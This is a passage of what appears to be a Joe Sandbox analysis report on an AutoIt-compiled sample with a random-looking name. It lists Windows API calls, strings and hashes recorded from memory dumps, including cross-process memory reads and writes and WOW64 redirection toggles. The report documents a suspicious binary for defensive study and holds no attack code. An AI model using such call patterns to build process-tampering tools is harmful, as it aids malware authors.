                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              • Opcode ID: 8521ea9ec38527f1d7cfafc19ec3a43dd2c50fd4e32294f8dd35972d1bf2d40d
                                                              • Instruction ID: 57fb11360d67a069697f2e4e448196327f6a378dd15b52b1f66110fb92c20f6c
                                                              • Opcode Fuzzy Hash: 8521ea9ec38527f1d7cfafc19ec3a43dd2c50fd4e32294f8dd35972d1bf2d40d
                                                              • Instruction Fuzzy Hash: 6701673090470897EB205B64DD5EBA67778BB00705F04466AA9C2D14E1D7E46958BBD0
                                                              APIs
                                                              • EndPath.GDI32(?), ref: 00F113BF
                                                              • StrokeAndFillPath.GDI32(?,?,00F4B888,00000000,?), ref: 00F113DB
                                                              • SelectObject.GDI32(?,00000000), ref: 00F113EE
                                                              • DeleteObject.GDI32 ref: 00F11401
                                                              • StrokePath.GDI32(?), ref: 00F1141C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                              • String ID:
                                                              • API String ID: 2625713937-0
                                                              • Opcode ID: 1348b8b35f6c4f38b21566cbf8756f1e7b8c1c18f62d97154c6a4229347dac05
                                                              • Instruction ID: e3a8492f9211f9412c8333b887ad882f28496027307559c9df0e55f7d19071d4
                                                              • Opcode Fuzzy Hash: 1348b8b35f6c4f38b21566cbf8756f1e7b8c1c18f62d97154c6a4229347dac05
                                                              • Instruction Fuzzy Hash: 04F0EC30005B0CEBDB119F26EC4C7983FAABB01B26F188226E529890F1C73159A9FF50
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 00F7C432
                                                              • CoCreateInstance.OLE32(00FA2D6C,00000000,00000001,00FA2BDC,?), ref: 00F7C44A
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                              • CoUninitialize.OLE32 ref: 00F7C6B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                                              • String ID: .lnk
                                                              • API String ID: 2683427295-24824748
                                                              • Opcode ID: cb2206124ad7c13b60383ba0e7e8853fb7bd365ddfd55fdf40e7a27e2542d131
                                                              • Instruction ID: 3fe739fd039bd7fc812db89221893f15121c735173fe5aceb8c90da84178166d
                                                              • Opcode Fuzzy Hash: cb2206124ad7c13b60383ba0e7e8853fb7bd365ddfd55fdf40e7a27e2542d131
                                                              • Instruction Fuzzy Hash: C4A15A71108205AFD300EF64CC91EABB7ECEF85354F00491DF159871A2EBB5EA49DB92
                                                              APIs
                                                                • Part of subcall function 00F30DB6: std::exception::exception.LIBCMT ref: 00F30DEC
                                                                • Part of subcall function 00F30DB6: __CxxThrowException@8.LIBCMT ref: 00F30E01
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                                • Part of subcall function 00F17A51: _memmove.LIBCMT ref: 00F17AAB
                                                              • __swprintf.LIBCMT ref: 00F22ECD
                                                              Strings
                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F22D66
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                              • API String ID: 1943609520-557222456
                                                              • Opcode ID: 0834488b37dda09ce37b148a5dffcd2e1be01c8806951ef584600902c0ab1d1e
                                                              • Instruction ID: 1bf5f9407124ef3dba7c7c2f45d734374ed476b7dd61642d4585ce5a290b9dfc
                                                              • Opcode Fuzzy Hash: 0834488b37dda09ce37b148a5dffcd2e1be01c8806951ef584600902c0ab1d1e
                                                              • Instruction Fuzzy Hash: DA917D71508711AFC714EF24DC95CAEB7B8EF85720F40081DF9559B2A1EA38ED88EB52
                                                              APIs
                                                                • Part of subcall function 00F14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F14743,?,?,00F137AE,?), ref: 00F14770
                                                              • CoInitialize.OLE32(00000000), ref: 00F7B9BB
                                                              • CoCreateInstance.OLE32(00FA2D6C,00000000,00000001,00FA2BDC,?), ref: 00F7B9D4
                                                              • CoUninitialize.OLE32 ref: 00F7B9F1
                                                                • Part of subcall function 00F19837: __itow.LIBCMT ref: 00F19862
                                                                • Part of subcall function 00F19837: __swprintf.LIBCMT ref: 00F198AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                              • String ID: .lnk
                                                              • API String ID: 2126378814-24824748
                                                              • Opcode ID: d45c4c4b9b31e64878fab1f8a989ae11dae9fd95a4caad233da43e4fe2b78a0a
                                                              • Instruction ID: 356d40bd0cb0b794a521bc2ab998c609c962ad3ed58d4118dce669a5c1283ae0
                                                              • Opcode Fuzzy Hash: d45c4c4b9b31e64878fab1f8a989ae11dae9fd95a4caad233da43e4fe2b78a0a
                                                              • Instruction Fuzzy Hash: FEA167756043059FC700EF14C894E5AB7E5FF8A324F048989F8999B3A1CB35ED46DB92
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 00F350AD
                                                                • Part of subcall function 00F400F0: __87except.LIBCMT ref: 00F4012B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__87except__start
                                                              • String ID: pow
                                                              • API String ID: 2905807303-2276729525
                                                              • Opcode ID: d5b24e8bffccc15442692dec532933b858505bc5dd81fdd1609481db7acbe709
                                                              • Instruction ID: bb6e3746f7bfbf5f84aabe5327399631ad5de0509c507dfcf92d4a7eb6542511
                                                              • Opcode Fuzzy Hash: d5b24e8bffccc15442692dec532933b858505bc5dd81fdd1609481db7acbe709
                                                              • Instruction Fuzzy Hash: 82516AA2D0C60686DB157724CD4176E3F90DBC1B30F208D59EDD5862E9EE798EC4BAC2
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memset$_memmove
                                                              • String ID: ERCP
                                                              • API String ID: 2532777613-1384759551
                                                              • Opcode ID: c37a907bb95129a9268c68179f7538046a1ecbae6e5a237c68aa01b7dcd2f094
                                                              • Instruction ID: f0cab5133d48c32eaadeeb3dbc8602c443835cebdefb9fe1cbf737756728deda
                                                              • Opcode Fuzzy Hash: c37a907bb95129a9268c68179f7538046a1ecbae6e5a237c68aa01b7dcd2f094
                                                              • Instruction Fuzzy Hash: 2E51A071D00316DBDB24CF65D985BABB7E4EF04324F20456EE84ADB291EB74AA44EB40
                                                              APIs
                                                                • Part of subcall function 00F714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F69296,?,?,00000034,00000800,?,00000034), ref: 00F714E6
                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F6983F
                                                                • Part of subcall function 00F71487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00F714B1
                                                                • Part of subcall function 00F713DE: GetWindowThreadProcessId.USER32(?,?), ref: 00F71409
                                                                • Part of subcall function 00F713DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F6925A,00000034,?,?,00001004,00000000,00000000), ref: 00F71419
                                                                • Part of subcall function 00F713DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F6925A,00000034,?,?,00001004,00000000,00000000), ref: 00F7142F
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F698AC
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F698F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                              • String ID: @
                                                              • API String ID: 4150878124-2766056989
                                                              • Opcode ID: a4ce354e6461adafaa345cf3b2fcc7ba885f8b03edfbcb3688c5716e4be2e67e
                                                              • Instruction ID: 370dcaf2dcfc4a7da3a3fa37dd6c2018dbb9b67f8847b8f99f28cd000be4f6bb
                                                              • Opcode Fuzzy Hash: a4ce354e6461adafaa345cf3b2fcc7ba885f8b03edfbcb3688c5716e4be2e67e
                                                              • Instruction Fuzzy Hash: 3A41307690021CAFDB20DFA4CC41ADEBBB8FB05710F004159F945B7151DA756E49DBA1
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F9F910,00000000,?,?,?,?), ref: 00F979DF
                                                              • GetWindowLongW.USER32 ref: 00F979FC
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F97A0C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID: SysTreeView32
                                                              • API String ID: 847901565-1698111956
                                                              • Opcode ID: a9c10d85d3379eac3281a48f901b16214bffa63af69b66680bdb782ca5d2c24e
                                                              • Instruction ID: 4465fbfa7904037fd4c40fb950364dd22888b4d209c0a41c2a796c35df601b2d
                                                              • Opcode Fuzzy Hash: a9c10d85d3379eac3281a48f901b16214bffa63af69b66680bdb782ca5d2c24e
                                                              • Instruction Fuzzy Hash: DE31CD3161430AABEF119F38CC41BEA77A9EB44334F244725F875E22E0D735E950AB50
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F97461
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F97475
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F97499
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: 7e71c147ebdd53ea4d186cf80e465ab581a9602139959bf2fb040ed2c007925b
                                                              • Instruction ID: 43de339ec7ad2ab6e8f4f2cbe18db2d771339bcd5aa071c731905a7852448d60
                                                              • Opcode Fuzzy Hash: 7e71c147ebdd53ea4d186cf80e465ab581a9602139959bf2fb040ed2c007925b
                                                              • Instruction Fuzzy Hash: 1D21B132510318ABEF11DF64CC46FEA3B69EB48724F110114FE156B1D1DAB5AC55EBA0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F97C4A
                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F97C58
                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F97C5F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DestroyWindow
                                                              • String ID: msctls_updown32
                                                              • API String ID: 4014797782-2298589950
                                                              • Opcode ID: e7aed9d8edbe0c60dc20e4f38916d1b7dd1ab3f36a132ac76d9339337b543730
                                                              • Instruction ID: 779032d0a33ab2265376f62fd584307f7166922812419d2905be823e6b3838d9
                                                              • Opcode Fuzzy Hash: e7aed9d8edbe0c60dc20e4f38916d1b7dd1ab3f36a132ac76d9339337b543730
                                                              • Instruction Fuzzy Hash: 2C217CB1614309AFEB10EF24DCC1DA737EDEB4A764B140059FA019B3A1CB32EC11AA60
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F96D3B
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F96D4B
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F96D70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              • Opcode ID: 29cd96a538a9a0db3d1e5537cc20a08bcaacdf470ceeb0f508e749ca2735099e
                                                              • Instruction ID: 4443e54589c44f5b5f31e8953940c85ae50cdde0afbdc59179eecfc0c2716cf4
                                                              • Opcode Fuzzy Hash: 29cd96a538a9a0db3d1e5537cc20a08bcaacdf470ceeb0f508e749ca2735099e
                                                              • Instruction Fuzzy Hash: 4B21C232A10118BFEF118F54DC45FAB3BBAEF89760F018129F9549B1A0CA719C51ABA0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F97772
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F97787
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F97794
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              • Opcode ID: b4d9e1a04845302b127beb5127dbb89abc9b8f6aca95a77ae1a598a5c5047c03
                                                              • Instruction ID: 6c461afd2137c542c1f76341ed78875c96870f45ac91dd4e57f2f7d7a5291c75
                                                              • Opcode Fuzzy Hash: b4d9e1a04845302b127beb5127dbb89abc9b8f6aca95a77ae1a598a5c5047c03
                                                              • Instruction Fuzzy Hash: 3811E772654309BAEF246FA5CC05FE77769EF88B64F114119F64196090C672E851EB10
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00F14B83,?), ref: 00F14C44
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F14C56
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-1355242751
                                                              • Opcode ID: d9bfa155996e46623ecdd5078f3f48bd1f0bc0090dc1649ed4c2992f03a1186e
                                                              • Instruction ID: ae26dca094771bc326329b91860e6fdd7d2d5909e87d57915261c90c72e92316
                                                              • Opcode Fuzzy Hash: d9bfa155996e46623ecdd5078f3f48bd1f0bc0090dc1649ed4c2992f03a1186e
                                                              • Instruction Fuzzy Hash: 89D0C730A00713CFDB208F31D90864A72E4AF01364B20883E94A6CA160E770E8C0EA90
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00F14BD0,?,00F14DEF,?,00FD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F14C11
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F14C23
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-3689287502
                                                              • Opcode ID: 74a27b8003a191202649ce1352e0deb041e4ed73182c9afd8a286d0cbe0560ae
                                                              • Instruction ID: 160b2e93bd605a82297dea3914e1c1534a2a24069977cf30630204cdcbcb7c85
                                                              • Opcode Fuzzy Hash: 74a27b8003a191202649ce1352e0deb041e4ed73182c9afd8a286d0cbe0560ae
                                                              • Instruction Fuzzy Hash: 23D0C230900713CFD7205FB0DD08A46B6D5EF09355B108C3E9485C2260E6B0E4C0E691
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00F91039), ref: 00F90DF5
                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F90E07
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                              • API String ID: 2574300362-4033151799
                                                              • Opcode ID: 3c6308d05ce2497dee3b7bc5d3f4e8d33dc21660be77928badcedb9d49f0795c
                                                              • Instruction ID: 35813b9a9155aa2dea7955cdf884c0713388a984be22c12d8bbee3b42578d32f
                                                              • Opcode Fuzzy Hash: 3c6308d05ce2497dee3b7bc5d3f4e8d33dc21660be77928badcedb9d49f0795c
                                                              • Instruction Fuzzy Hash: 57D0C730804327CFEB20AF70C809B8272E4AF00362F048C3E9486C2160EAB0D8D0EA80
                                                              APIs
